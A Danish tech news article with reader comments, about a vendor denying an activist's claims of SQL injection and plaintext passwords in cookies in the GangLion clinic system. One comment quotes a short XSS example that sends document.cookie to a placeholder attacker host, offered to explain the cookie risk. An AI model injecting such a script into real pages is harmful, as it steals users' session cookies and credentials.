Udvikler af lægesystem afviser påstand om SQL-injection: »Det kan alle komme og sige«

I den forgangne uge har adskillige øjne været rettet mod kliniklægesystemerne GangLion og GangWeb, efter aktivist Torben Andersen rettede kritik mod virksomhedens beskyttelse af oplysninger. Nu har de svaret på tiltalen.

I sidste weekend rettede Torben Andersen, bedst beskrevet som internet-aktivist, en alarm mod lægesystemet GangLion. Her skulle det angiveligt være muligt via SQL-injection at trække adskillige personfølsomme data ned, blandt andet privatpersoners recepter.

I den forgangne uge fik vi på Version2 tilsendt en rapport af Torben Andersen, som belyser flere problemer på sider, som er forbundne med GangLion.

Læs også: Aktivist: SQL-injection blotlagde borgeres recepter

Vi har præsenteret teknisk direktør ved Aver & Lauritzen Jens Christian Lauritzen for disse punkter, så han har mulighed for at be- eller afkræfte påstandene.

SQL-injection sårbarhed

Blandt de kritikpunkter, som optræder i rapporten, er den mest omtalte muligheden for at udføre SQL-injection på sider tilhørende GangLion.

I rapporten skriver Torben Andersen, 'at denne sårbarhed kan ikke valideres (…) ved hjælp af screenshots, men den har med sikkerhed været der, bekræfter flere kilder'. Han vurderer i øvrigt truslen som værende 'høj'.

Dette kan Jens Christian Lauritzen ikke bekræfte.

»Det er nemt at sige, at 'her kan jeg lave en SQL-injection'. Det kan alle komme og sige. Men vi har ikke fundet tegn på, at det skulle være muligt,« siger han.

Han tilføjer dog, at de tager anklagerne seriøst.

»Der er nogle af de her personer, som er enormt dygtige, så derfor tager vi det naturligvis meget seriøst.«

Passwords gemmes i klar tekst

Et andet kritikpunkt, som optræder i rapporten, er, at passwords og brugernavne optræder i klar tekst i de cookies, som lagres på computeren.

Her skriver Torben Andersen i rapporten, at 'når en bruger logger ind, gemmes brugernavn samt ukrypteret password i Cookies, hvilket kan føre til kompromittering af loginoplysninger igennem et Man-In-The-Middle angreb på netværket eller via XSS-sårbarheder'.

Heller ikke denne påstand kan Jens Christian Lauritzen genkende.

»Jeg har meget svært ved at forestille mig, at det skulle være sandt,« siger han.

»I det hele taget har vi ikke kunne finde tegn på, at de postulater, som er blevet fremlagt, skulle være sande.«

SSL-sikring

I en tidligere artikel omtalte vi, at GangWeb og GangLion ikke var HTTPS-sikret. Her skal det for god ordens skyld påpeges, at det, ifølge Jens Christian Lauritzen, kun drejer sig om sider, hvorpå der ikke ligger personhenførbare oplysninger.

Læs også: Aktivist: SQL-injection blotlagde borgeres recepter

Det vil sige, at det screenshot, som vi lagde op i en tidligere artikel, stammer fra en side, hvor der ikke behandles personhenførbare oplysninger. Det drejer sig om en side, hvor man kunne søge efter lægeklinikkers hjemmesider.

Har lanceret en ny side

»Vi lukkede GangLion ned med det samme, at vi fik disse oplysninger. Samtidig var vi ved at bygge en ny side op, og så tænkte vi, at nu vi var så tæt på [at lancere den nye side, red.], så valgte vi at lukke siden ned i stedet for at bruge en hel masse tid på at finde ud af, hvad der er op og ned,« siger Jens Christian Lauritzen.

Den nye side er nu nogenlunde kommet op at stå.

Det har ikke været muligt at be- eller afkræfte de påstande, som fremføres i rapporten objektivt – derfor er det ord mod ord.

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Følg forløbet
Kommentarer (5)
sortSortér kommentarer
  • Ældste først
  • Nyeste først
  • Bedste først
Henrik Pedersen

Et andet kritikpunkt, som optræder i rapporten, er, at passwords og brugernavne optræder i klar tekst i de cookies, som lagres på computeren.

Her skriver Torben Andersen i rapporten, at »når en bruger logger ind, gemmes brugernavn samt ukrypteret password i Cookies, hvilket kan føre til kompromittering af loginoplysninger igennem et Man-In-The-Middle angreb på netværket eller via XSS-sårbarheder.«

Heller ikke denne påstand kan Jens Christian Lauritzen genkende.

»Jeg har meget svært ved at forestille mig, at det skulle være sandt,« siger han.

»I det hele taget har vi ikke kunne finde tegn på, at de postulater, som er blevet fremlagt, skulle være sande.«

Lad den lige synke ind. De kan ikke logge ind på deres egen hjemmeside og bruge Chrome dev tools til at checke efter. Han "forestiller sig" det ikke er sandt, han ved ikke... Det er bare rent bullshit de lukker ud... Hold nu op.

Det værste er at han overgår i "højt sprog":

»I det hele taget har vi ikke kunne finde tegn på, at de postulater, som er blevet fremlagt, skulle være sande.«

For at snakke uden om noget der er SÅ simpelt at tjekke, at en 1. års Webintegrator kan gøre det med hjælp fra en Youtube video om hacking for begyndere... Hvis påstanden virkelig var usand, og de havde tjekket, så havde de haft beviser og kunnet sige med sikkerhed det ikke fandt sted. Suk.

  • 27
  • 0
Peter Hansen

Her skriver Torben Andersen i rapporten, at »når en bruger logger ind, gemmes brugernavn samt ukrypteret password i Cookies, hvilket kan føre til kompromittering af loginoplysninger igennem et Man-In-The-Middle angreb på netværket eller via XSS-sårbarheder.«

Heller ikke denne påstand kan Jens Christian Lauritzen genkende.

»Jeg har meget svært ved at forestille mig, at det skulle være sandt,« siger han.

Ovenstående udsagn viser, at manden ikke aner, hvad han taler om, og at han bør hyre en it-sikkerhedskonsulent med det samme.

An example attack scenario

In this example, we will assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website. This can be done by having the victim's browser parse the following HTML code:

 <script>  
window.location='http://attacker/?cookie='+document.cookie  
</script> 

https://excess-xss.com/

  • 4
  • 1
Frithiof Andreas Jensen

Ovenstående udsagn viser, at manden ikke aner, hvad han taler om, og at han bør hyre en it-sikkerhedskonsulent med det samme.

Der findes rigtigt mange folk hvis höjt betalte job er ikke at vide noget, ikke höre noget, ikke forstå noget og da slet ikke kunne forestille sig noget.

I övrigt en oplagt mulighed for "Machine Intelligence", alle kan vel bygge en AI som ikke kan noget?

  • 9
  • 0
Log ind eller Opret konto for at kommentere